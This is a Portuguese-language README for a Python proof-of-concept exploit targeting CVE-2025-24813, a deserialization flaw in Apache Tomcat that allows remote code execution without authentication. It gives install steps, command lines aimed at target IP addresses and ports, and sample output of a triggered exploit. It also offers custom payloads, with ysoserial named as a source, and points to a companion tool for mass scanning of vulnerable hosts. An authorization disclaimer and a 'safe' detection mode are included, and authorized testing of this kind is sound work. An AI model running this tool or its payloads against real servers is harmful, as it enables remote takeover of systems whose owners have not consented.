
Um exploit de prova de conceito em Python para CVE-2025-24813 - RCE não autenticado no Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) por meio de desserialização de objetos Java maliciosos. Inclui modo de detecção seguro e suporte a payloads personalizados.
Um exploit de prova de conceito para a vulnerabilidade de desserialização do Apache Tomcat (CVE-2025-24813). Esta ferramenta demonstra como atacantes poderiam explorar a desserialização insegura no gerenciamento de sessão do Tomcat.
AVISO: Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais. O uso não autorizado contra sistemas que você não possui é ilegal.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
Uso básico:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
Opções avançadas:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| Argumento | Descrição | Obrigatório |
|---|---|---|
-t, --target | Endereço IP do alvo | Sim |
-p, --port | Número da porta do alvo | Sim |
--protocol | http ou https (padrão: http) | Não |
--no-verify | Desativar verificação do certificado SSL | Não |
--timeout | Tempo limite de solicitação em segundos (padrão: 10) | Não |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
Para varredura em massa de sistemas vulneráveis:
🔍 CVE-2025-24813-Scanner - Ferramenta de detecção em massa para hosts Tomcat vulneráveis
Se você for afetado por esta vulnerabilidade:
Este software é fornecido sob a Licença MIT. O autor não é responsável por qualquer uso indevido desta ferramenta. Sempre obtenha autorização adequada antes de testar sistemas.
Licença MIT - Consulte o arquivo LICENSE para obter detalhes.